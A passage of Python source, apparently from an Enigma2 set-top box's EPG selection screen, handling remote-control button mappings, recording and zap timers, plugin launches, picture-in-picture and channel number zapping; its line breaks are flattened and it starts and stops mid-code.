self.openEPGSearch() if config.epgselection.graph_yellow.value == "showmovies": self.showMovieSelection() if config.epgselection.graph_yellow.value == "record": self.RecordTimerQuestion() if config.epgselection.graph_yellow.value == "gotodatetime": self.enterDateTime() if config.epgselection.graph_yellow.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self.nextPage() if config.epgselection.graph_yellow.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self.prevPage() if config.epgselection.graph_yellow.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self.nextBouquet() if config.epgselection.graph_yellow.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self.prevBouquet() elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_yellow.value == "24plus": self.setPlus24h() if config.epgselection.vertical_yellow.value == "24minus": self.setMinus24h() if config.epgselection.vertical_yellow.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.vertical_yellow.value == "imdb" or config.epgselection.vertical_yellow.value == None: self.openIMDb() if config.epgselection.vertical_yellow.value == "autotimer": self.addAutoTimer() if config.epgselection.vertical_yellow.value == "bouquetlist": self.Bouquetlist() if config.epgselection.vertical_yellow.value == "epgsearch": self.openEPGSearch() if config.epgselection.vertical_yellow.value == "showmovies": self.showMovieSelection() if config.epgselection.vertical_yellow.value == "record": self.RecordTimerQuestion() if config.epgselection.vertical_yellow.value == "gotoprimetime": self.gotoPrimetime() if config.epgselection.vertical_yellow.value == "setbasetime": self.setBasetime() if config.epgselection.vertical_yellow.value == "gotodatetime": self.enterDateTime() else: self.openEPGSearch() def blueButtonPressed(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_blue.value == "24plus": self.nextService() if config.epgselection.graph_blue.value == "24minus": self.prevService() if config.epgselection.graph_blue.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.graph_blue.value == "imdb": self.openIMDb() if config.epgselection.graph_blue.value == "autotimer" or config.epgselection.graph_blue.value == None: self.addAutoTimer() if config.epgselection.graph_blue.value == "bouquetlist": self.Bouquetlist() if config.epgselection.graph_blue.value == "epgsearch": self.openEPGSearch() if config.epgselection.graph_blue.value == "showmovies": self.showMovieSelection() if config.epgselection.graph_blue.value == "record": self.RecordTimerQuestion() if config.epgselection.graph_blue.value == "gotodatetime": self.enterDateTime() if config.epgselection.graph_blue.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self.nextPage() if config.epgselection.graph_blue.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self.prevPage() if config.epgselection.graph_blue.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self.nextBouquet() if config.epgselection.graph_blue.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self.prevBouquet() elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_blue.value == "24plus": self.setPlus24h() if config.epgselection.vertical_blue.value == "24minus": self.setMinus24h() if config.epgselection.vertical_blue.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.vertical_blue.value == "imdb" or config.epgselection.vertical_blue.value == None: self.openIMDb() if config.epgselection.vertical_blue.value == "autotimer": self.addAutoTimer() if config.epgselection.vertical_blue.value == "bouquetlist": self.Bouquetlist() if config.epgselection.vertical_blue.value == "epgsearch": self.openEPGSearch() if config.epgselection.vertical_blue.value == "showmovies": self.showMovieSelection() if config.epgselection.vertical_blue.value == "record": self.RecordTimerQuestion() if config.epgselection.vertical_blue.value == "gotoprimetime": self.gotoPrimetime() if config.epgselection.vertical_blue.value == "setbasetime": self.setBasetime() if config.epgselection.vertical_blue.value == "gotodatetime": self.enterDateTime() else: self.addAutoTimer() def blueButtonPressedLong(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if InfoBarInstance.LongButtonPressed: self.showAutoTimerList() def openSimilarList(self, eventid, refstr): self.session.open(EPGSelection, refstr, None, eventid) def setServices(self, services): self.services = services self.onCreate() def setService(self, service): self.currentService = service self.onCreate() def eventViewCallback(self, setEvent, setService, val): l = self['list'+str(self.activeList)] old = l.getCurrent() if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: self.updEvent(val, False) elif val == -1: self.moveUp() elif val == +1: self.moveDown() cur = l.getCurrent() if (self.type == EPG_TYPE_MULTI or self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH) and cur[0] is None and cur[1].ref != old[1].ref: self.eventViewCallback(setEvent, setService, val) else: setService(cur[1]) setEvent(cur[0]) def eventSelected(self): self.infoKeyPressed() def sortEpg(self): if self.type == EPG_TYPE_SINGLE or self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR: if config.epgselection.sort.value == '0': config.epgselection.sort.setValue('1') else: config.epgselection.sort.setValue('0') config.epgselection.sort.save() configfile.save() self['list'].sortSingleEPG(int(config.epgselection.sort.value)) def OpenSingleEPG(self): cur = self['list'+str(self.activeList)].getCurrent() if cur[0] is not None: event = cur[0] serviceref = cur[1].ref if serviceref is not None: self.session.open(SingleEPG, serviceref) def openIMDb(self): try: from Plugins.Extensions.IMDb.plugin import IMDB, IMDBEPGSelection try: cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] name = event.getEventName() except: name = '' self.session.open(IMDB, name, False) except ImportError: self.session.open(MessageBox, _('The IMDb plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10) def openEPGSearch(self): try: from Plugins.Extensions.EPGSearch.EPGSearch import EPGSearch try: cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] name = event.getEventName() except: name = '' self.session.open(EPGSearch, name, False) except ImportError: self.session.open(MessageBox, _('The EPGSearch plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10) def addAutoTimer(self): try: from Plugins.Extensions.AutoTimer.AutoTimerEditor import addAutotimerFromEvent cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] if not event: return serviceref = cur[1] addAutotimerFromEvent(self.session, evt=event, service=serviceref) self.refreshTimer.start(3000) except ImportError: self.session.open(MessageBox, _('The AutoTimer plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10) def addAutoTimerSilent(self): try: from Plugins.Extensions.AutoTimer.AutoTimerEditor import addAutotimerFromEventSilent cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] if not event: return serviceref = cur[1] addAutotimerFromEventSilent(self.session, evt=event, service=serviceref) self.refreshTimer.start(3000) except ImportError: self.session.open(MessageBox, _('The AutoTimer plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10) def showTimerList(self): from Screens.TimerEdit import TimerEditList self.session.open(TimerEditList) def showMovieSelection(self): from Screens.InfoBar import InfoBar InfoBar.instance.showMovies() def showAutoTimerList(self): global autopoller global autotimer try: from Plugins.Extensions.AutoTimer.plugin import main, autostart from Plugins.Extensions.AutoTimer.AutoTimer import AutoTimer from Plugins.Extensions.AutoTimer.AutoPoller import AutoPoller autopoller = AutoPoller() autotimer = AutoTimer() try: autotimer.readXml() except SyntaxError as se: self.session.open(MessageBox, _('Your config file is not well-formed:\n%s') % str(se), type=MessageBox.TYPE_ERROR, timeout=10) return if autopoller is not None: autopoller.stop() from Plugins.Extensions.AutoTimer.AutoTimerOverview import AutoTimerOverview self.session.openWithCallback(self.editCallback, AutoTimerOverview, autotimer) except ImportError: self.session.open(MessageBox, _('The AutoTimer plugin is not installed!\nPlease install it.'), type=MessageBox.TYPE_INFO, timeout=10) def editCallback(self, session): global autopoller global autotimer if session is not None: autotimer.writeXml() autotimer.parseEPG() if config.plugins.autotimer.autopoll.value: if autopoller is None: from Plugins.Extensions.AutoTimer.AutoPoller import AutoPoller autopoller = AutoPoller() autopoller.start() else: autopoller = None autotimer = None def timerAdd(self): self.RecordTimerQuestion(True) def editTimer(self, timer): self.session.open(TimerEntry, timer) def removeTimer(self, timer): self.closeChoiceBoxDialog() timer.afterEvent = AFTEREVENT.NONE self.session.nav.RecordTimer.removeEntry(timer) self.setTimerButtonText(_("Add Timer")) self.key_green_choice = self.ADD_TIMER self.refreshlist() def disableTimer(self, timer): self.closeChoiceBoxDialog() timer.disable() self.session.nav.RecordTimer.timeChanged(timer) self.setTimerButtonText(_("Add Timer")) self.key_green_choice = self.ADD_TIMER self.refreshlist() def RecordTimerQuestion(self, manual=False): cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] serviceref = cur[1] if event is None: return eventid = event.getEventId() refstr = ':'.join(serviceref.ref.toString().split(':')[:11]) foundtimer = title = None for timer in self.session.nav.RecordTimer.timer_list: if ':'.join(timer.service_ref.ref.toString().split(':')[:11]) == refstr and timer.eit == eventid: foundtimer = timer break else: if self.session.nav.isRecordTimerImageStandard: eventBegin = event.getBeginTime() eventDuration = event.getDuration() x = self.session.nav.RecordTimer.isInTimer(eventid, eventBegin, eventDuration, refstr, True) if x and x[1] in (2, 7, 12): foundtimer = x[3] if foundtimer: timer = foundtimer if timer.isRunning(): cb_func1 = lambda ret: self.removeTimer(timer) cb_func2 = lambda ret: self.editTimer(timer) menu = [(_("Delete timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func1), (_("Edit timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func2)] else: cb_func1 = lambda ret: self.removeTimer(timer) cb_func2 = lambda ret: self.editTimer(timer) cb_func3 = lambda ret: self.disableTimer(timer) menu = [(_("Delete timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func1), (_("Edit timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func2), (_("Disable timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func3)] title = _("Select action for timer %s:") % event.getEventName() else: if not manual: cb_func1 = lambda ret: self.doRecordTimer(True) menu = [(_("Add Record Timer"), 'CALLFUNC', self.RemoveChoiceBoxCB, cb_func1), (_("Add Zap Timer"), 'CALLFUNC', self.ChoiceBoxCB, self.doZapTimer), (_("Add Zap+Record Timer"), 'CALLFUNC', self.ChoiceBoxCB, self.doZapRecordTimer), (_("Add AutoTimer"), 'CALLFUNC', self.ChoiceBoxCB, self.addAutoTimerSilent) ] title = "%s?" % event.getEventName() else: newEntry = RecordTimerEntry(serviceref, checkOldTimers=True, dirname=preferredTimerPath(), *parseEvent(event)) self.session.openWithCallback(self.finishedAdd, TimerEntry, newEntry) if title: self.ChoiceBoxDialog = self.session.instantiateDialog(ChoiceBox, title=title, list=menu, keys=['red', 'green', 'yellow', 'blue'], skin_name="RecordTimerQuestion") serviceref = eServiceReference(str(self['list'+str(self.activeList)].getCurrent()[1])) pos = self['list'+str(self.activeList)].getSelectionPosition(serviceref, self.activeList) sf = getSkinFactor() posx = max(self.instance.position().x() + pos[0] - self.ChoiceBoxDialog.instance.size().width() - 20*sf, 0) posy = self.instance.position().y() + pos[1] posy += self['list'+str(self.activeList)].itemHeight - 2*sf if posy + self.ChoiceBoxDialog.instance.size().height() > 720*sf: posy -= self['list'+str(self.activeList)].itemHeight - 4*sf + self.ChoiceBoxDialog.instance.size().height() self.ChoiceBoxDialog.instance.move(ePoint(int(posx), int(posy))) self.showChoiceBoxDialog() def recButtonPressed(self): from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: self.RecordTimerQuestion() def recButtonPressedLong(self): from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if InfoBarInstance.LongButtonPressed: self.doZapTimer() def RemoveChoiceBoxCB(self, choice): self.closeChoiceBoxDialog() if choice: choice(self) def ChoiceBoxCB(self, choice): self.closeChoiceBoxDialog() if choice: try: choice() except: choice def showChoiceBoxDialog(self): self['okactions'].setEnabled(False) if 'epgcursoractions' in self: self['epgcursoractions'].setEnabled(False) self['colouractions'].setEnabled(False) self['recordingactions'].setEnabled(False) self['epgactions'].setEnabled(False) self["dialogactions"].setEnabled(True) self.ChoiceBoxDialog['actions'].execBegin() self.ChoiceBoxDialog.show() if 'input_actions' in self: self['input_actions'].setEnabled(False) def closeChoiceBoxDialog(self): self["dialogactions"].setEnabled(False) if self.ChoiceBoxDialog: self.ChoiceBoxDialog['actions'].execEnd() self.session.deleteDialog(self.ChoiceBoxDialog) self['okactions'].setEnabled(True) if 'epgcursoractions' in self: self['epgcursoractions'].setEnabled(True) self['colouractions'].setEnabled(True) self['recordingactions'].setEnabled(True) self['epgactions'].setEnabled(True) if 'input_actions' in self: self['input_actions'].setEnabled(True) def doRecordTimer(self, rec=False): if not rec and 'Plugins.Extensions.EPGSearch.EPGSearch.EPGSearch' in repr(self): self.RecordTimerQuestion() else: self.doInstantTimer(0, 0) def doZapTimer(self): self.doInstantTimer(1, 0) def doZapRecordTimer(self): self.doInstantTimer(0, 1) def doInstantTimer(self, zap, zaprecord): cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] serviceref = cur[1] if event is None: return eventid = event.getEventId() refstr = serviceref.ref.toString() newEntry = RecordTimerEntry(serviceref, checkOldTimers=True, *parseEvent(event)) self.InstantRecordDialog = self.session.instantiateDialog(InstantRecordTimerEntry, newEntry, zap, zaprecord) retval = [True, self.InstantRecordDialog.retval()] self.session.deleteDialogWithCallback(self.finishedAdd, self.InstantRecordDialog, retval) def finishedAdd(self, answer): if answer[0]: entry = answer[1] simulTimerList = self.session.nav.RecordTimer.record(entry) if simulTimerList is not None: for x in simulTimerList: if x.setAutoincreaseEnd(entry): self.session.nav.RecordTimer.timeChanged(x) simulTimerList = self.session.nav.RecordTimer.record(entry) if simulTimerList is not None: if not entry.repeated and not config.recording.margin_before.value and not config.recording.margin_after.value and len(simulTimerList) > 1: change_time = False conflict_begin = simulTimerList[1].begin conflict_end = simulTimerList[1].end if conflict_begin == entry.end: entry.end -= 30 change_time = True elif entry.begin == conflict_end: entry.begin += 30 change_time = True if change_time: simulTimerList = self.session.nav.RecordTimer.record(entry) if simulTimerList is not None: self.session.openWithCallback(self.finishSanityCorrection, TimerSanityConflict, simulTimerList) self.setTimerButtonText(_("Change timer")) self.key_green_choice = self.REMOVE_TIMER else: self.setTimerButtonText(_("Add Timer")) self.key_green_choice = self.ADD_TIMER self.refreshlist() def finishSanityCorrection(self, answer): self.finishedAdd(answer) def OK(self): from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if self.zapnumberstarted: self.dozumberzap() else: if self.type == EPG_TYPE_VERTICAL and 'Channel' in config.epgselection.vertical_ok.value: self.infoKeyPressed() elif ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_ok.value == 'Zap') or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_ok.value == 'Zap') or ((self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_ok.value == 'Zap') or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_ok.value == 'Zap') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_ok.value == 'Zap')): self.zapTo() elif ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_ok.value == 'Zap + Exit') or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_ok.value == 'Zap + Exit') or ((self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_ok.value == 'Zap + Exit') or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_ok.value == 'Zap + Exit') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_ok.value == 'Zap + Exit')): self.zap() def OKLong(self): from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if InfoBarInstance.LongButtonPressed: if self.zapnumberstarted: self.dozumberzap() else: if self.type == EPG_TYPE_VERTICAL and 'Channel' in config.epgselection.vertical_oklong.value: self.infoKeyPressed() elif ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_oklong.value == 'Zap') or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_oklong.value == 'Zap') or ((self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_oklong.value == 'Zap') or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_oklong.value == 'Zap') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_oklong.value == 'Zap')): self.zapTo() elif ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_oklong.value == 'Zap + Exit') or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_oklong.value == 'Zap + Exit') or ((self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_oklong.value == 'Zap + Exit') or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_oklong.value == 'Zap + Exit') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_oklong.value == 'Zap + Exit')): self.zap() def epgButtonPressed(self): self.OpenSingleEPG() def Info(self): from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if (self.type == EPG_TYPE_GRAPH and config.epgselection.graph_info.value == 'Channel Info') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_info.value == 'Channel Info'): self.infoKeyPressed() elif (self.type == EPG_TYPE_GRAPH and config.epgselection.graph_info.value == 'Single EPG') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_info.value == 'Single EPG'): self.OpenSingleEPG() else: self.infoKeyPressed() def InfoLong(self): from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if InfoBarInstance.LongButtonPressed: if (self.type == EPG_TYPE_GRAPH and config.epgselection.graph_infolong.value == 'Channel Info') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_infolong.value == 'Channel Info'): self.infoKeyPressed() elif (self.type == EPG_TYPE_GRAPH and config.epgselection.graph_infolong.value == 'Single EPG') or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_infolong.value == 'Single EPG'): self.OpenSingleEPG() else: self.OpenSingleEPG() def applyButtonState(self, state): if state == 0: self['now_button'].hide() self['now_button_sel'].hide() self['next_button'].hide() self['next_button_sel'].hide() self['more_button'].hide() self['more_button_sel'].hide() self['now_text'].hide() self['next_text'].hide() self['more_text'].hide() self['key_red'].setText('') else: if state == 1: self['now_button_sel'].show() self['now_button'].hide() else: self['now_button'].show() self['now_button_sel'].hide() if state == 2: self['next_button_sel'].show() self['next_button'].hide() else: self['next_button'].show() self['next_button_sel'].hide() if state == 3: self['more_button_sel'].show() self['more_button'].hide() else: self['more_button'].show() self['more_button_sel'].hide() def onSelectionChanged(self): if self.type != EPG_TYPE_VERTICAL: self.activeList = '' cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] self['Event'].newEvent(event) if cur[1] is None: self['Service'].newService(None) else: self['Service'].newService(cur[1].ref) if self.type == EPG_TYPE_MULTI: count = self['list'].getCurrentChangeCount() if self.ask_time != -1: self.applyButtonState(0) elif count > 1: self.applyButtonState(3) elif count > 0: self.applyButtonState(2) else: self.applyButtonState(1) datestr = '' if event is not None: now = time() beg = event.getBeginTime() nowTime = localtime(now) begTime = localtime(beg) if nowTime[2] != begTime[2]: datestr = strftime(config.usage.date.dayshort.value, begTime) else: datestr = '%s' % _('Today') self['date'].setText(datestr) if cur[1] is None or cur[1].getServiceName() == '': if self.key_green_choice != self.EMPTY: self.setTimerButtonText('') self.key_green_choice = self.EMPTY return if event is None: if self.key_green_choice != self.EMPTY: self.setTimerButtonText('') self.key_green_choice = self.EMPTY return serviceref = cur[1] eventid = event.getEventId() refstr = ':'.join(serviceref.ref.toString().split(':')[:11]) isRecordEvent = False for timer in self.session.nav.RecordTimer.timer_list: if ':'.join(timer.service_ref.ref.toString().split(':')[:11]) == refstr and timer.eit == eventid: isRecordEvent = True break else: if self.session.nav.isRecordTimerImageStandard: eventBegin = event.getBeginTime() eventDuration = event.getDuration() x = self.session.nav.RecordTimer.isInTimer(eventid, eventBegin, eventDuration, refstr) if x and x[1] in (2, 7, 12): isRecordEvent = True if isRecordEvent and self.key_green_choice != self.REMOVE_TIMER: self.setTimerButtonText(_("Change timer")) self.key_green_choice = self.REMOVE_TIMER elif not isRecordEvent and self.key_green_choice != self.ADD_TIMER: self.setTimerButtonText(_("Add Timer")) self.key_green_choice = self.ADD_TIMER if self.eventviewDialog and (self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH): self.infoKeyPressed(True) def moveTimeLines(self, force = False): self.updateTimelineTimer.start((60 - int(time()) % 60) * 1000) self['timeline_text'].setEntries(self['list'], self['timeline_now'], self.time_lines, force) self['list'].l.invalidate() def isPlayable(self): current = ServiceReference(self.servicelist.getCurrentSelection()) return not current.ref.flags & (eServiceReference.isMarker | eServiceReference.isDirectory) def setServicelistSelection(self, bouquet, service): if self.servicelist: if self.servicelist.getRoot() != bouquet: self.servicelist.clearPath() self.servicelist.enterPath(self.servicelist.bouquet_root) self.servicelist.enterPath(bouquet) self.servicelist.setCurrentSelection(service) def closeEventViewDialog(self): if self.eventviewDialog: self.eventviewDialog.hide() del self.eventviewDialog self.eventviewDialog = None def closeScreen(self, NOCLOSE = False): if self.type == EPG_TYPE_SINGLE: self.close() return # stop and do not continue. if hasattr(self, 'servicelist') and self.servicelist: selected_ref = str(ServiceReference(self.servicelist.getCurrentSelection())) current_ref = str(ServiceReference(self.session.nav.getCurrentlyPlayingServiceOrGroup())) if selected_ref != current_ref: self.servicelist.restoreRoot() self.servicelist.setCurrentSelection(self.session.nav.getCurrentlyPlayingServiceOrGroup()) if self.session.nav.getCurrentlyPlayingServiceOrGroup() and self.StartRef and self.session.nav.getCurrentlyPlayingServiceOrGroup().toString() != self.StartRef.toString(): if self.zapFunc and self.StartRef and self.StartBouquet: if ((self.type == EPG_TYPE_GRAPH and config.epgselection.graph_preview_mode.value) or (self.type == EPG_TYPE_MULTI and config.epgselection.multi_preview_mode.value) or (self.type in (EPG_TYPE_INFOBAR, EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_preview_mode.value in ('1', '2')) or (self.type == EPG_TYPE_ENHANCED and config.epgselection.enhanced_preview_mode.value) or (self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_preview_mode.value)): if '0:0:0:0:0:0:0:0:0' not in self.StartRef.toString(): self.zapFunc(None, zapback = True) elif '0:0:0:0:0:0:0:0:0' in self.StartRef.toString(): self.session.nav.playService(self.StartRef) else: self.zapFunc(None, False) if self.session.pipshown: if not self.Oldpipshown: self.Oldpipshown = False self.session.pipshown = False del self.session.pip if self.Oldpipshown: self.session.pipshown = True self.closeEventViewDialog() if self.type == EPG_TYPE_VERTICAL and NOCLOSE: return self.close(True) def zap(self): if self.session.nav.getCurrentlyPlayingServiceOrGroup() and '0:0:0:0:0:0:0:0:0' in self.session.nav.getCurrentlyPlayingServiceOrGroup().toString(): return if self.zapFunc: self.zapSelectedService() self.closeEventViewDialog() self.close(True) else: self.closeEventViewDialog() self.close() def zapSelectedService(self, prev=False): currservice = self.session.nav.getCurrentlyPlayingServiceReference() and str(self.session.nav.getCurrentlyPlayingServiceReference().toString()) or None if self.session.pipshown and config.usage.pip_mode.value == "standard": self.prevch = self.session.pip.getCurrentService() and str(self.session.pip.getCurrentService().toString()) or None else: self.prevch = self.session.nav.getCurrentlyPlayingServiceReference() and str(self.session.nav.getCurrentlyPlayingServiceReference().toString()) or None lst = self["list"+str(self.activeList)] count = lst.getCurrentChangeCount() if count == 0: ref = lst.getCurrent()[1] if ref is None and self.type == EPG_TYPE_VERTICAL and self.myServices[0][0]: ref = ServiceReference(self.myServices[self["list"].getSelectionIndex()+self.activeList-1][0]) if ref is not None: if (self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH) and config.epgselection.infobar_preview_mode.value == '2': if not prev: if self.session.pipshown: self.session.pipshown = False del self.session.pip self.zapFunc(ref.ref, bouquet = self.getCurrentBouquet(), preview = False) return if not self.session.pipshown: self.session.pip = self.session.instantiateDialog(PictureInPicture) self.session.pip.show() self.session.pipshown = True n_service = self.pipServiceRelation.get(str(ref.ref), None) if n_service is not None: service = eServiceReference(n_service) else: service = ref.ref if self.currch == service.toString(): if self.session.pipshown: self.session.pipshown = False del self.session.pip self.zapFunc(ref.ref, bouquet = self.getCurrentBouquet(), preview = False) return if self.prevch != service.toString() and currservice != service.toString(): self.session.pip.playService(service) self.currch = self.session.pip.getCurrentService() and str(self.session.pip.getCurrentService().toString()) else: self.zapFunc(ref.ref, bouquet = self.getCurrentBouquet(), preview = prev) self.currch = self.session.nav.getCurrentlyPlayingServiceReference() and str(self.session.nav.getCurrentlyPlayingServiceReference().toString()) self['list'+str(self.activeList)].setCurrentlyPlaying(self.session.nav.getCurrentlyPlayingServiceOrGroup()) if self.Oldpipshown: self.session.pipshown = True def zapTo(self): if self.session.nav.getCurrentlyPlayingServiceOrGroup() and '0:0:0:0:0:0:0:0:0' in self.session.nav.getCurrentlyPlayingServiceOrGroup().toString(): #from Screens.InfoBarGenerics import setResumePoint #setResumePoint(self.session) return if self.zapFunc: self.zapSelectedService(True) self.refreshTimer.start(2000) if not self.currch or self.currch == self.prevch: if self.zapFunc: self.zapFunc(None, False) self.closeEventViewDialog() self.close('close') else: self.closeEventViewDialog() self.close() def keyNumberGlobal(self, number): if self.createTimer.isActive(): return if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if self.type == EPG_TYPE_GRAPH: now = time() - int(config.epgselection.graph_histminutes.value) * 60 prevtimeperiod = config.epgselection.graph_prevtimeperiod roundto = config.epgselection.graph_roundto primetimehour = config.epgselection.graph_primetimehour primetimemins = config.epgselection.graph_primetimemins else: now = time() - int(config.epgselection.infobar_histminutes.value) * 60 prevtimeperiod = config.epgselection.infobar_prevtimeperiod roundto = config.epgselection.infobar_roundto primetimehour = config.epgselection.infobar_primetimehour primetimemins = config.epgselection.infobar_primetimemins if number == 1: timeperiod = int(prevtimeperiod.value) if timeperiod > 60: timeperiod -= 60 self['list'].setEpoch(timeperiod) prevtimeperiod.setValue(timeperiod) self.moveTimeLines() elif number == 2: self.prevPage() elif number == 3: timeperiod = int(prevtimeperiod.value) if timeperiod < 300: timeperiod += 60 self['list'].setEpoch(timeperiod) prevtimeperiod.setValue(timeperiod) self.moveTimeLines() elif number == 4: self.updEvent(-2) elif number == 5: self.ask_time = now - now % (int(roundto.value) * 60) self['list'].resetOffset() self['list'].fillGraphEPG(None, self.ask_time, True) self.moveTimeLines(True) elif number == 6: self.updEvent(+2) elif number == 7 and self.type == EPG_TYPE_GRAPH: if config.epgselection.graph_heightswitch.value: config.epgselection.graph_heightswitch.setValue(False) else: config.epgselection.graph_heightswitch.setValue(True) self['list'].setItemsPerPage() self['list'].fillGraphEPG(None) self.moveTimeLines() elif number == 8: self.nextPage() elif number == 9: basetime = localtime(self['list'].getTimeBase()) basetime = (basetime[0], basetime[1], basetime[2], int(primetimehour.value), int(primetimemins.value), 0, basetime[6], basetime[7], basetime[8]) self.ask_time = mktime(basetime) if self.ask_time + 3600 < time(): self.ask_time += 86400 self['list'].resetOffset() self['list'].fillGraphEPG(None, self.ask_time) self.moveTimeLines(True) elif number == 0: self.toTop() self.ask_time = now - now % (int(roundto.value) * 60) self['list'].resetOffset() self['list'].fillGraphEPG(None, self.ask_time, True) self.moveTimeLines() elif self.type == EPG_TYPE_VERTICAL: if number == 1: self.gotoFirst() elif number == 2: self.allUp() elif number == 3: self.gotoLast() elif number == 4: self.prevPage(True) elif number == 0: if self.zapFunc: self.closeScreen(True) self.onCreate() elif number == 6: self.nextPage(True) elif number == 7: self.gotoNow() elif number == 8: self.allDown() elif number == 9: self.gotoPrimetime() elif number == 5: self.setBasetime() else: self.zapnumberstarted = True self.NumberZapTimer.start(5000, True) if not self.NumberZapField: self.NumberZapField = str(number) else: self.NumberZapField += str(number) self.handleServiceName() self["number"].setText(self.zaptoservicename+'\n'+self.NumberZapField) self["number"].show() if len(self.NumberZapField) >= 4: self.dozumberzap() def dozumberzap(self): self.zapnumberstarted = False self.numberEntered(self.service, self.bouquet) def handleServiceName(self): if self.searchNumber: self.service, self.bouquet = self.searchNumber(int(self.NumberZapField)) self.zaptoservicename = ServiceReference(self.service).getServiceName() def numberEntered(self, service = None, bouquet = None): if service is not None: self.zapToNumber(service, bouquet) def searchNumberHelper(self, serviceHandler, num, bouquet): servicelist = serviceHandler.list(bouquet) if servicelist is not None: serviceIterator = servicelist.getNext() while serviceIterator.valid(): if num == serviceIterator.getChannelNum(): return serviceIterator serviceIterator = servicelist.getNext() return None def searchNumber(self, number): bouquet = self.servicelist.getRoot() service = None serviceHandler = eServiceCenter.getInstance() service = self.searchNumberHelper(serviceHandler, number, bouquet) if config.usage.multibouquet.value: service = self.searchNumberHelper(serviceHandler, number, bouquet) if service is None: bouquet = self.servicelist.bouquet_root bouquetlist = serviceHandler.list(bouquet) if bouquetlist is not None: bouquet = bouquetlist.getNext() while bouquet.valid(): if bouquet.flags & eServiceReference.isDirectory: service = self.searchNumberHelper(serviceHandler, number, bouquet) if service is not None: playable = not service.flags & (eServiceReference.isMarker | eServiceReference.isDirectory) or service.flags & eServiceReference.isNumberedMarker if not playable: service = None break if config.usage.alternative_number_mode.value: break bouquet = bouquetlist.getNext() return service, bouquet def zapToNumber(self, service, bouquet): self["number"].hide() self.NumberZapField = None self.CurrBouquet = bouquet self.CurrService = service if service is not None: self.setServicelistSelection(bouquet, service) self.onCreate() def RefreshColouredKeys(self): if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_red.value == "24plus": self['key_red'] = 